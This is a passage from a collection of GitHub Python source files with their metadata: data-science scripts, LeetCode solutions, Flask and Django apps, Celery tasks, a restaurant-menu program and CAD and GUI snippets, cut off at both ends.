weight is None:\n new_arr = np.array(new_hists[key])\n elif self.wt2_ext and key.endswith(self.wt2_ext):\n new_arr = np.array(new_hists[key]) * weight**2\n else:\n new_arr = np.array(new_hists[key])*weight\n\n hist_dict[key] += new_arr\n else:\n raise HistAddError('not sure what to do with {}, {}'.format(\n type(subgroup), key))\n\n def _write(self, hists, group):\n for key, hist in hists.items():\n if isinstance(hist, dict):\n subgrp = group.create_group(key)\n self._write(hist, subgrp)\n else:\n hist.write_to(group, key)\n\n def add(self, group, weight=1.0):\n self.hists = self._merge(self.hists, group, weight)\n def fast_add(self, group, weight=None):\n self._fast_merge(self.hists, group, weight)\n\n def write_to(self, group):\n self._write(self.hists, group)\n\n def dump(self, group=None, base=''):\n if not group:\n group = self.hists\n for key, subgroup in group.items():\n path = '/'.join([base, key])\n if isinstance(subgroup, dict):\n self.dump(subgroup, path)\n else:\n print(path, subgroup.array.sum())\n\nclass HistAddError(Exception):\n def __init__(self, args):\n super(HistAddError, self).__init__(args)\n\n","repo_name":"dguest/susy-analysis","sub_path":"python3/scharm/aggregate/histadd.py","file_name":"histadd.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8601870813","text":"import cv2 as cv\nimport numpy as np\nimport sys\n\nimg = cv.imread(\"data/YaleB/yaleB02/yaleB02_P00A+000E+00.png\",0)\n\nif img is None:\n print(\"Error::Cannot read image\")\n sys.exit()\n\nprint(img)\n\ncv.imshow('image',img)\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"CristobalBL/pyLocalOpImage","sub_path":"read_images.py","file_name":"read_images.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2806594056","text":"\"\"\" Load saved FLAML model and get heuristic feature importances. \n\nFor a model trained with FLAML, will load the underlying saved model\nand get the heuristic feature importances for that class of model. The\noptions are:\n\n\tlightgbm.sklearn.LGBMRegressor or lightgbm.sklearn.LGBMClassifier\n\t\t- 'split': number of times a feature is used to split the data\n\t\t\tacross all trees\n\t\t- 'gain': total gain of splits which use the feature is used\n\n\tTODO: add other models\n\nThe feature importances are saved as a dataframe and plotted with bar\nplot(s).\n\nCommand-line arguments:\n\t-m, --model_path: path to saved FLAML model\n\t-o, --output_dir: directory to save plots to. Default: current directory\n\t-n, --num_features: top n features to plot. Default: 50\n\"\"\"\n\nimport argparse\nimport pickle\nimport os\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport lightgbm as lgb\n\n\ndef lightgbm_feat_importances(model):\n\t\"\"\" Get heuristic feature importances for lightgbm model.\n\t\n\tReturns:\n\t\tfeat_df: dataframe of feature importance scores ('Split' and 'Gain')\n\t\t\tfor each feature name.\n\t\"\"\"\n\tlgb_booster = model.estimator.booster_\n\n\tfeat_df = pd.DataFrame({\n\t\t'Feature': lgb_booster.feature_name(),\n\t\t'Split': lgb_booster.feature_importance(importance_type='split'),\n\t\t'Gain': lgb_booster.feature_importance(importance_type='gain')\n\t})\n\n\treturn feat_df\n\n\ndef catboost_feat_importances(model):\n\t\"\"\" Get heuristic feature importances for catboost model.\n\t\n\tReturns:\n\t\tfeat_df: dataframe of feature importance score\n\t\t\t('PredictionValuesChange').\n\t\"\"\"\n\t# model.estimator.get_feature_importance(type='FeatureImportance')\n\n\treturn pd.DataFrame({\n\t\t'Feature': model.estimator.feature_names_,\n\t\t'PredictionValuesChange': model.estimator.get_feature_importance(\n\t\t\ttype='PredictionValuesChange'\n\t\t)\n\t})\n\t\n\nif __name__ == '__main__':\n \n\t# Parse command-line arguments\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\n\t\t'-m', '--model_path', type=str, required=True,\n\t\thelp='Path to saved FLAML model'\n\t)\n\tparser.add_argument(\n\t\t'-o', '--output_dir', type=str, default='.',\n\t\thelp='Directory to save plots to. Default: current directory'\n\t)\n\tparser.add_argument(\n\t\t'-n', '--num_features', type=int, default=50,\n\t\thelp='Top n features to plot. Default: 50'\n\t)\n\targs = parser.parse_args()\n\n\t# Load saved FLAML model\n\twith open(args.model_path, 'rb') as f:\n\t\tmodel = pickle.load(f)\n\n\t# Get heuristic feature importance dataframe and list of feature names\n\tif (\n\t\tmodel.estimator_class is lgb.sklearn.LGBMRegressor\n\t\tor model.estimator_class is lgb.sklearn.LGBMClassifier\n\t):\n\t\tfeat_df = lightgbm_feat_importances(model)\n\t\timp_score_names = ['Split', 'Gain']\n\telif 'CatBoost' in model.estimator_class.__name__:\n\t\tfeat_df = catboost_feat_importances(model)\n\t\timp_score_names = ['PredictionValuesChange']\n\telse:\n\t\traise NotImplementedError(\n\t\t\tf'Feature importances not implemented for model type {model.estimator_class.__name__}'\n\t\t)\n\t\n\t# Add feature type column to dataframe\n\t# Categories:\n\t# \t- 'PC': principal component ('pc' in feature name)\n\t# \t- 'Rare': rare variant ('rare' in feature name)\n\t# \t- 'Common': common variant ('common' in feature name)\n\t# \t- 'Covar': other feature\n\tfeat_df['Type'] = 'Covar'\n\tfeat_df.loc[feat_df['Feature'].str.contains('pc'), 'Type'] = 'PC'\n\tfeat_df.loc[feat_df['Feature'].str.contains('rare'), 'Type'] = 'Rare'\n\tfeat_df.loc[feat_df['Feature'].str.contains('common'), 'Type'] = 'Common'\n\n\t# Save feature importance dataframe\n\tfeat_df.to_csv(\n\t\tos.path.join(args.output_dir, 'heur_feat_importances.csv'),\n\t\tindex=False\n\t)\n\n\t# Plot feature importances for top n features\n\tfor score_name in imp_score_names:\n\t\t# get sorted dataframe of top n features wrt score_name\n\t\ttop_n_feat_df = feat_df.sort_values(\n\t\t\tscore_name, ascending=False\n\t\t).iloc[:args.num_features]\n\n\t\t# plot barplot\n\t\tplt.figure(figsize=(10, 10))\n\t\tsns.barplot(\n\t\t\tx=score_name,\n\t\t\ty='Feature',\n\t\t\thue='Type',\n\t\t\tdata=top_n_feat_df,\n\t\t\tdodge=False,\n\t\t\thue_order=['Covar', 'Common', 'PC', 'Rare']\n\t\t).set_ylabel('')\n\t\tplt.xlabel(score_name)\n\t\tplt.tight_layout()\n\t\tplt.savefig(\n\t\t\tos.path.join(\n\t\t\t\targs.output_dir, \n\t\t\t\tf'feat_importances_{score_name}_top_{args.num_features}.png'\n\t\t\t)\n\t\t)\n\t\tplt.close()\n","repo_name":"RossDeVito/gwas_models","sub_path":"auto_ml/get_heuristic_feat_importance.py","file_name":"get_heuristic_feat_importance.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3941289747","text":"class Solution:\n def manhattanDis (self,x1:int, y1:int, x2:int, y2: int):\n xdif = abs(x1 - x2) \n ydif= abs(y1 - y2)\n if xdif == 0 or ydif == 0:\n return xdif + ydif\n \n return -1\n \n def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:\n ans = []\n for i in range(len(points)):\n manResult = self.manhattanDis(x, y, points[i][0], points[i][1])\n ans.append(manResult)\n answer = float(\"inf\")\n ansInd = -1\n for i in range(len(ans)):\n if ans[i] < answer and ans[i]!= -1:\n ansInd = i\n answer = ans[i]\n return ansInd\n \n \n \n \n\n \n \n ","repo_name":"Beki4382/Competitive-Programming","sub_path":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate/1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4656116899","text":"import filecmp\nimport shutil\nimport unittest\nimport os\nfrom quatradis.comparison.split import split_plot\n\ndata_dir = os.path.join('data', 'comparison', 'split')\n\n\nclass TestSplit(unittest.TestCase):\n\n def test_split_plot(self):\n output_dir = os.path.join(data_dir, \"small_case\", \"output\")\n\n split_plot(os.path.join(data_dir, 'small_case.insert_site_plot.gz'), output_dir, minimum_threshold=5)\n\n self.assertTrue(os.path.exists(os.path.join(output_dir, \"combined.plot.gz\")))\n self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"combined.plot.gz\"),\n os.path.join(data_dir, \"small_case\", \"combined.plot.gz\")))\n\n self.assertTrue(os.path.exists(os.path.join(output_dir, \"forward.plot.gz\")))\n self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"forward.plot.gz\"),\n os.path.join(data_dir, \"small_case\", \"forward.plot.gz\")))\n\n self.assertTrue(os.path.exists(os.path.join(output_dir, \"reverse.plot.gz\")))\n self.assertTrue(filecmp.cmp(os.path.join(output_dir, \"reverse.plot.gz\"),\n os.path.join(data_dir, \"small_case\", \"reverse.plot.gz\")))\n\n shutil.rmtree(output_dir)\n","repo_name":"quadram-institute-bioscience/QuaTradis","sub_path":"tests/py/comparison/split_test.py","file_name":"split_test.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39527439631","text":"import logging\nfrom flask import Flask, jsonify, request\nfrom ringConnector.core import downloadDaysDingVideos\nimport datetime\n\nlogging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG)\nlogging.getLogger('requests_oauthlib').setLevel(logging.INFO)\nlogging.getLogger('urllib3').setLevel(logging.INFO)\n\napp = Flask(__name__)\n\n\nlogging.info(\"Server started\")\n\n\n@app.route('/')\ndef hello():\n return 'Pong'\n\n@app.route('/connector/download/today')\ndef downloadForToday():\n logging.debug(f\"Downloading todays events\")\n eventsList = downloadDaysDingVideos()\n return jsonify(eventsList)\n\n@app.route('/connector/download/', methods=[\"POST\"])\ndef downloadForDay(dayString):\n downloadedEventsRingIds = request.json\n logging.debug(f\"Downloading {dayString}. Will not re-download events {downloadedEventsRingIds}\")\n\n # assert dayString == request.view_args['day']\n \n dayToDownload = datetime.datetime.strptime(dayString, '%Y%m%d').date()\n\n eventsList = downloadDaysDingVideos(dayToDownload = dayToDownload, downloadedEventsRingIds = downloadedEventsRingIds)\n\n logging.debug(f\"downloaded {len(eventsList)} new events for {dayToDownload}\")\n\n return jsonify(eventsList)\n","repo_name":"ring-face/ringface-connector","sub_path":"ringConnector/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28173304711","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import *\nfrom datetime import datetime\n\nfrom django.db.models import Q # Q-objects concept \n\ndef index(request):\n return render(request, 'index.html')\n\ndef all_emp(request):\n emps = Employee.objects.all()\n\n context = {\n 'emps':emps\n }\n return render(request, 'view_all_emp.html', context)\n\ndef add_emp(request):\n if request.method == 'POST':\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n salary = int(request.POST['salary'])\n bonus = int(request.POST['bonus'])\n phone = int(request.POST['phone'])\n role = request.POST['role']\n dept = int(request.POST['dept'])\n\n new_emp = Employee(first_name=first_name, last_name=last_name, salary=salary, bonus=bonus, phone=phone, role_id = role, dept_id = dept, hire_date = datetime.now())\n new_emp.save()\n print(new_emp)\n return redirect('/all_emp')\n elif request.method == 'GET':\n return render(request, 'add_emp.html')\n else:\n return HttpResponse(\"Distraction occured\")\n\ndef remove_emp(request, emp_id = 0):\n if emp_id:\n try:\n emp_to_be_removed = Employee.objects.get(id = emp_id)\n emp_to_be_removed.delete()\n return redirect('/')\n except:\n return HttpResponse(\"Please enter a valid EMP ID\")\n\n emps = Employee.objects.all()\n\n context = {\n 'emps':emps\n }\n return render(request, 'remove_emp.html', context)\n\ndef filter_emp(request):\n if request.method == 'POST':\n name = request.POST['name']\n dept = request.POST['dept']\n role = request.POST['role']\n\n emps = Employee.objects.all()\n # below is formets to be writen.\n if name:\n emps = emps.filter(Q(first_name__icontains = name) | Q(last_name__icontains = name))\n if dept:\n emps = emps.filter(dept__name__icontains = dept)\n if role: # icontains is used to filter either using single letter, it maybe upper-case or lower-case\n emps = emps.filter(role__name = role)\n\n context = {\n 'emps':emps\n }\n\n return render(request, 'view_all_emp.html', context)\n \n elif request.method == 'GET':\n return render(request, 'filter_emp.html')\n else:\n return HttpResponse(\"An exception occured\")\n\n return render(request, 'filter_emp.html', context)\n\n","repo_name":"rohittgajula/EMPLOYEE_MANAGEMENT-Django","sub_path":"emp_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27315052177","text":"class ItemMenu:\n def __init__(self, id, nome, descricao, categoria, preco):\n self.id = id\n self.nome = nome\n self.descricao = descricao\n self.categoria = categoria\n self.preco = preco\n\nclass Pedido:\n def __init__(self, id, item, id_mesa, id_cliente, data_hora):\n self.id = id\n self.item = item\n self.id_mesa = id_mesa\n self.id_cliente = id_cliente\n self.data_hora = data_hora\n\nclass Mesa:\n def __init__(self, id, capacidade):\n self.id = id\n self.capacidade = capacidade\n\nclass Cliente:\n def __init__(self, id, nome, telefone, email):\n self.id = id\n self.nome = nome\n self.telefone = telefone\n self.email = email\n\nclass Restaurante:\n def __init__(self):\n self.cardapio = []\n self.pedidos = []\n self.mesas = []\n self.clientes = []\n\n def adicionar_item(self, nome, descricao, categoria, preco):\n item_id = len(self.cardapio) + 1\n item = ItemMenu(item_id, nome, descricao, categoria, preco)\n self.cardapio.append(item)\n return item\n\n def adicionar_pedido(self, item_menu, id_mesa, id_cliente, data_hora):\n pedido_id = len(self.pedidos) + 1\n pedido = Pedido(pedido_id, item_menu, id_mesa, id_cliente, data_hora)\n self.pedidos.append(pedido)\n return pedido\n\n def adicionar_mesa(self, capacidade):\n mesa_id = len(self.mesas) + 1\n mesa = Mesa(mesa_id, capacidade)\n self.mesas.append(mesa)\n return mesa\n\n def adicionar_cliente(self, nome, telefone, email):\n cliente_id = len(self.clientes) + 1\n cliente = Cliente(cliente_id, nome, telefone, email)\n self.clientes.append(cliente)\n return cliente\n\n def obter_item_por_id(self, item_id):\n for item in self.cardapio:\n if item.id == item_id:\n return item\n return None\n\n def obter_mesa_por_id(self, mesa_id):\n for mesa in self.mesas:\n if mesa.id == mesa_id:\n return mesa\n return None\n\n def obter_cliente_por_id(self, cliente_id):\n for cliente in self.clientes:\n if cliente.id == cliente_id:\n return cliente\n return None\n\n def obter_cardapio(self):\n return self.cardapio\n\n def obter_pedidos_por_mesa(self, mesa_id):\n pedidos_mesa = []\n for pedido in self.pedidos:\n if pedido.id_mesa == mesa_id:\n pedidos_mesa.append(pedido)\n return pedidos_mesa\n\n def obter_pedidos_por_cliente(self, cliente_id):\n pedidos_cliente = []\n for pedido in self.pedidos:\n if pedido.id_cliente == cliente_id:\n pedidos_cliente.append(pedido)\n return pedidos_cliente\n\n def obter_mesas_disponiveis(self):\n mesas_disponiveis = []\n for mesa in self.mesas:\n if self.verificar_mesa_disponivel(mesa.id):\n mesas_disponiveis.append(mesa)\n return mesas_disponiveis\n\n def verificar_mesa_disponivel(self, mesa_id):\n for pedido in self.pedidos:\n if pedido.id_mesa == mesa_id:\n return False\n return True\n\n def exibir_menu(self):\n opcao = 0\n while opcao != 5:\n print(\"----- MENU -----\")\n print(\"1. Pedidos por cliente\")\n print(\"2. Cardápio\")\n print(\"3. Mesas disponíveis\")\n print(\"4. Clientes cadastrados\")\n print(\"5. Sair\")\n opcao = int(input(\"Selecione uma opção: \"))\n\n if opcao == 1:\n cliente_id = int(input(\"Digite o ID do cliente: \"))\n pedidos_cliente = self.obter_pedidos_por_cliente(cliente_id)\n if pedidos_cliente:\n print(f\"Pedidos do cliente {self.obter_cliente_por_id(cliente_id).nome}:\")\n for pedido in pedidos_cliente:\n item = self.obter_item_por_id(pedido.item.id)\n print(f\"Pedido: {item.nome} - Data/Hora: {pedido.data_hora}\")\n else:\n print(\"Nenhum pedido encontrado para o cliente.\")\n\n elif opcao == 2:\n cardapio = self.obter_cardapio()\n print(\"Cardápio:\")\n for item in cardapio:\n print(f\"Item: {item.nome} - Categoria: {item.categoria} - Preço: R${item.preco}\")\n\n elif opcao == 3:\n mesas_disponiveis = self.obter_mesas_disponiveis()\n if mesas_disponiveis:\n print(\"Mesas disponíveis:\")\n for mesa in mesas_disponiveis:\n print(f\"Mesa disponível: {mesa.id} - Capacidade: {mesa.capacidade}\")\n else:\n print(\"Todas as mesas estão ocupadas.\")\n\n elif opcao == 4:\n clientes = self.clientes\n if clientes:\n print(\"Clientes cadastrados:\")\n for cliente in clientes:\n print(f\"Cliente: {cliente.nome} - Telefone: {cliente.telefone} - Email: {cliente.email}\")\n else:\n print(\"Nenhum cliente cadastrado.\")\n\n elif opcao == 5:\n print(\"Saindo do programa...\")\n break\n\n else:\n print(\"Opção inválida. Digite novamente.\")\n\nrestaurante = Restaurante()\n\n# Adicionar itens ao menu\nitem_salada = restaurante.adicionar_item(\"Salada\", \"Salada com alface, croutons e molho Caesar\", \"Entrada\", 15.0)\nitem_spaghetti = restaurante.adicionar_item(\"Spaghetti à Bolonhesa\", \"Massa de spaghetti com molho à bolonhesa\", \"Prato Principal\", 25.0)\nitem_sorvete = restaurante.adicionar_item(\"Sorvete de Morango\", \"Sorvete de Morango com cobertura\", \"Sobremesa\", 12.0)\nitem_picanha = restaurante.adicionar_item(\"Picanha Argentina\", \"Refeição de Picanha Argentina\", \"Prato Principal\", 80.0)\nitem_frango = restaurante.adicionar_item(\"Frango assado\", \"Refeição de Frango Assado\", \"Prato Principal\", 80.0)\nitem_saladadefruta = restaurante.adicionar_item(\"Salada de frutas\", \"Salada de frutas vermelhas\", \"Sobremesa\", 9.0)\nitem_espetinho = restaurante.adicionar_item(\"espetinho\", \"Espetinho de carne, de frango ou porco\", \"Entrada\", 7.0)\nitem_lasanha = restaurante.adicionar_item(\"Lasanha\", \"Lasanha de carne\", \"Prato Principal\", 28.0)\nitem_frangodeso = restaurante.adicionar_item(\"Frango desossado\", \"Frango desossado\", \"Prato Principal\", 35.0)\nitem_pizza = restaurante.adicionar_item(\"Pizza\", \"Pizza Pequena(pedaço)\", \"Entrada\", 10.0)\nitem_hamburguer = restaurante.adicionar_item(\"Hamburguer\", \"Hamburguer duas carnes, ovo e salada\", \"Entrada\", 15.0)\nitem_pastel = restaurante.adicionar_item(\"Pastel\", \"Pastel de carne, de frango ou queijo\", \"Entrada\", 12.0)\n\n# Adicionar mesas ao restaurante\nmesa_1 = restaurante.adicionar_mesa(4)\nmesa_2 = restaurante.adicionar_mesa(4)\nmesa_3 = restaurante.adicionar_mesa(6)\nmesa_4 = restaurante.adicionar_mesa(4)\nmesa_5 = restaurante.adicionar_mesa(2)\nmesa_6 = restaurante.adicionar_mesa(8)\nmesa_7 = restaurante.adicionar_mesa(6)\nmesa_8 = restaurante.adicionar_mesa(4)\n\n# Adicionar clientes ao restaurante\ncliente_1 = restaurante.adicionar_cliente(\"João Pedro\", \"9925-1111\", \"jjj23@hotmail.com\")\ncliente_2 = restaurante.adicionar_cliente(\"Mariana\", \"9899-2222\", \"mariana@example.com\")\ncliente_3 = restaurante.adicionar_cliente(\"Pedro Avelar\", \"8899-3873\", \"peduy12@gmail.com\")\ncliente_4 = restaurante.adicionar_cliente(\"Nunes\", \"8779-0023\", \"pnunes012@hotmail.com\")\ncliente_5 = restaurante.adicionar_cliente(\"Pedro Luiz\", \"8979-3323\", \"pedr@hotmail.com\")\ncliente_6 = restaurante.adicionar_cliente(\"Antonieta\", \"8991-3323\", \"ped872@hotmail.com\")\ncliente_7 = restaurante.adicionar_cliente(\"Maria Luiza\", \"8999-3323\", \"luizah012@hotmail.com\")\ncliente_8 = restaurante.adicionar_cliente(\"Pedro Fontineles\", \"8099-9393\", \"pedrin1298@hotmail.com\")\ncliente_9 = restaurante.adicionar_cliente(\"Lucas Fontineles\", \"8909-3320\", \"lkfontineles29@hotmail.com\")\n\n# Fazer pedidos\nrestaurante.adicionar_pedido(item_salada, mesa_1.id, cliente_1.id, \"2023-06-28 11:00:00\")\nrestaurante.adicionar_pedido(item_espetinho, mesa_1.id, cliente_1.id, \"2023-06-28 11:10:00\")\nrestaurante.adicionar_pedido(item_spaghetti, mesa_2.id, cliente_2.id, \"2023-06-28 11:30:00\")\nrestaurante.adicionar_pedido(item_sorvete, mesa_1.id, cliente_3.id, \"2023-06-28 13:00:00\")\nrestaurante.adicionar_pedido(item_sorvete, mesa_2.id, cliente_2.id, \"2023-06-28 13:30:00\")\nrestaurante.adicionar_pedido(item_picanha, mesa_3.id, cliente_4.id, \"2023-06-28 13:20:00\")\nrestaurante.adicionar_pedido(item_frango, mesa_2.id, cliente_5.id, \"2023-06-28 12:30:00\")\nrestaurante.adicionar_pedido(item_spaghetti, mesa_5.id, cliente_9.id, \"2023-06-28 12:10:50\")\nrestaurante.adicionar_pedido(item_salada, mesa_5.id, cliente_8.id, \"2023-06-28 12:00:00\")\nrestaurante.adicionar_pedido(item_hamburguer, mesa_6.id, cliente_7.id, \"2023-06-28 18:30:00\")\nrestaurante.adicionar_pedido(item_saladadefruta, mesa_6.id, cliente_7.id, \"2023-06-28 18:30:55\")\nrestaurante.adicionar_pedido(item_pizza, mesa_6.id, cliente_7.id, \"2023-06-28 18:31:00\")\n\n# Exibir menu interativo\nrestaurante.exibir_menu()\n","repo_name":"GFONTINELES/projeto_restaurante","sub_path":"de.py","file_name":"de.py","file_ext":"py","file_size_in_byte":9227,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19804090630","text":"import os\nimport numpy as np\nimport cv2\nimport scipy.io\n\nfrom blueprint.ml import Dataset, Split\n\n\nclass AFLW_19(Dataset):\n def __init__(self, root, split=Split.ALL, subset: str = 'full'):\n self.images_root = os.path.join(root, 'data', 'flickr')\n info = scipy.io.loadmat(os.path.join(\n root, 'AFLWinfo_release.mat'))\n self.bbox = info['bbox'] # 24386x4 left, right, top bottom\n self.data = info['data'] # 24386x38 x1,x2...,xn,y1,y2...,yn\n self.mask = info['mask_new'] # 24386x19\n self.name_list = [s[0][0] for s in info['nameList']]\n\n ra = np.reshape(info['ra'].astype(np.int32), [-1])-1\n assert ra.min() == 0\n assert ra.max() == self.bbox.shape[0] - 1\n if split == Split.ALL:\n self.indices = ra\n elif split == Split.TRAIN:\n self.indices = ra[:20000]\n elif split == Split.TEST:\n if subset == 'full':\n self.indices = ra[20000:]\n elif subset == 'frontal':\n all_visible = np.all(self.mask == 1, axis=1) # 24386\n self.indices = np.array(\n [ind for ind in ra[20000:] if all_visible[ind]])\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, index):\n ind = self.indices[index]\n image_path = os.path.join(\n self.images_root, self.name_list[ind])\n assert os.path.exists(image_path)\n image = cv2.cvtColor(cv2.imread(image_path), cv2.COLOR_BGR2RGB)\n landmarks = np.reshape(self.data[ind], [2, 19]).transpose()\n\n left, right, top, bottom = self.bbox[ind]\n box_y1x1y2x2 = np.array([top, left, bottom, right], dtype=np.float32)\n\n visibility = self.mask[ind]\n return {\n 'image': image,\n 'box': box_y1x1y2x2,\n 'landmarks': landmarks,\n 'visibility': visibility\n }\n\n def sample_name(self, index):\n return str(index)\n","repo_name":"FacePerceiver/FaRL","sub_path":"farl/datasets/aflw.py","file_name":"aflw.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":280,"dataset":"github-code","pt":"53"} +{"seq_id":"71476705128","text":"import os\nimport requests\nfrom dotenv import load_dotenv\nfrom django.contrib.auth import get_user_model\nfrom config.celery import app\nfrom .utils import send_email\n\n\nload_dotenv()\n\nUser = get_user_model()\n\n\nBASE_URL = os.environ.get(\"BASE_URL\")\n\n\n@app.task(bind=True, default_retry_delay=5 * 60)\ndef send_email_for_user(self, data):\n \"\"\"\n Добавляет отправку сообщения пользователю\n в очередь Celery\n\n При ошибке повторная попытка отправить сообщение\n произойдет через 1 минуту\n \"\"\"\n try:\n send_email(\n data=data\n )\n except Exception as exc:\n raise self.retry(exc=exc, countdown=60)\n\n\n@app.task(bind=True, default_retry_delay=5 * 60)\ndef create_user_wallet(self, access_token):\n \"\"\"\n Добавляет создание кошелька пользователю\n в очередь Celery\n\n При ошибке повторная попытка отправить сообщение\n произойдет через 1 минуту\n \"\"\"\n\n auth_data = {\n 'Authorization': f'Bearer {access_token}'\n }\n try:\n requests.post(\n url=BASE_URL + '/api/v1/users/create',\n headers=auth_data\n )\n except Exception as exc:\n raise self.retry(exc=exc, countdown=60)\n","repo_name":"EasyDev-co/CloudMiningWebsite","sub_path":"backend/src/users/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30421195137","text":"N,M = map(int,input().split())\n\nlst = [i for i in range(1,N+1)]\n\nresult = []\n\ndef finding(start):\n if len(result) == M:\n for i in result:\n print(i, end =\" \")\n print()\n else:\n for i in range(len(lst)):\n if len(result) > 0:\n if lst[i] >= result[-1]: \n result.append(lst[i])\n finding(i+1) \n result.pop() \n else:\n result.append(lst[i])\n finding(i+1)\n result.pop()\n\nfinding(0)","repo_name":"JunHyungJang/codingtest","sub_path":"Baekjoon/backtracking/15651.py","file_name":"15651.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25198202472","text":"class Solution:\n def romanToInt(self, s: str) -> int:\n hashmap = {\"I\": 1,\"V\": 5, \"X\":10, \"L\":50, \"C\": 100, \"D\": 500, \"M\": 1000, \"IV\": 4, \"IX\": 9, \"XL\":40, \"XC\":90, \"CD\":400, \"CM\":900}\n skip = 0\n res = 0\n for i in range(len(s)):\n if skip:\n skip = 0\n continue\n if s[i:i+2] in hashmap:\n skip = 1\n res += hashmap.get(s[i:i+2])\n continue\n res += hashmap.get(s[i])\n return res\n \n","repo_name":"Reflectrr/leetcode","sub_path":"13.roman_to_integer.py","file_name":"13.roman_to_integer.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70791067688","text":"import ezdxf\nfrom ezdxf.lldxf import const\n\n# Trying to have an hatch with hole.\n\nname = 'test_hatch_hole.dxf'\n\ndwg = ezdxf.new('AC1015') # hatch requires the DXF R2000 (AC1015) format or later\nmsp = dwg.modelspace() # adding entities to the model space\n\ndwg.layers.new('HATCH', dxfattribs={'linetype': 'Continuous', 'color': 8})\n\nhatch = msp.add_hatch(color=1, dxfattribs={'layer': 'HATCH'})\n\nwith hatch.edit_boundary() as boundary: \n # every boundary path is always a 2D element\n boundary.add_polyline_path([(0, 0), (10, 0), (10, 10), (0, 10)], is_closed=1, flags=const.BOUNDARY_PATH_EXTERNAL)\n boundary.add_polyline_path([(3, 3), (7, 3), (7, 7), (3, 7)], is_closed=1, flags=const.BOUNDARY_PATH_OUTERMOST) # hole\n\ndwg.saveas(name)\n","repo_name":"DatacloudIntl/dc_ezdxf","sub_path":"issues/20170329 HatchHole/HatchHole.py","file_name":"HatchHole.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20519278280","text":"#\n# This file is part of Vizy \n#\n# All Vizy source code is provided under the terms of the\n# GNU General Public License v2 (http://www.gnu.org/licenses/gpl-2.0.html).\n# Those wishing to use Vizy source code, software and/or\n# technologies under different licensing terms should contact us at\n# support@charmedlabs.com. \n#\n\n# Name of Google Photos album to store photos\nALBUM = \"radar\"\n# Mimimum value before differences in pixel values are considered motion\nNOISE_FLOOR = 30*3\n# Maximum amount of time a vehicle can take to traverse the width of the image\nDATA_TIMEOUT = 10 # seconds\n# Number of seconds the speed is displayed on the video window after a vehicle's speed is measured\nSPEED_DISPLAY_TIMEOUT = 3 # seconds\n# Font size to overlay the speed on top of the video/image\nFONT_SIZE = 60 \n# Color to overlay speed\nFONT_COLOR = (0, 255, 0)\n# Color to overlay speed if speed limit is exceeded\nFONT_COLOR_EXCEED = (0, 0, 255)\n# Minimum number of data points for a valid vehicle detection\nMINIMUM_DATA = 3\n# Camera shutter speed (seconds)\nSHUTTER_SPEED = 0.001\n# Camera shutter speed in low light conditions (seconds)\nLOW_LIGHT_SHUTTER_SPEED = 1/30\n# Maximum least-squares fitting error per data point for a valid vehicle detection\nMAX_RESIDUAL = 100\n","repo_name":"charmedlabs/vizy","sub_path":"apps/radar/radar_consts.py","file_name":"radar_consts.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"28898248947","text":"# https://leetcode.com/problems/n-ary-tree-level-order-traversal/\n\n\n# BFS, TC:O(N), SC:O(N)\ndef levelOrder(root: 'Node') -> List[List[int]]:\n res = []\n queue = [root]\n while queue and root:\n res.append([])\n leafs = []\n for node in queue:\n res[-1].append(node.val)\n if not node.children: continue\n leafs.extend(node.children)\n queue = leafs\n return res","repo_name":"ychanc2104/LeetCode","sub_path":"N-ary Tree Level Order Traversal.py","file_name":"N-ary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26744667227","text":"# coding: utf-8\nimport wx\n\nclass MyDialog(wx.Frame):\n\n def __init__(self,parent,id,title):\n wx.Frame.__init__(self,parent,id,title)\n panel=wx.Panel(self,-1,size=(300,250))\n 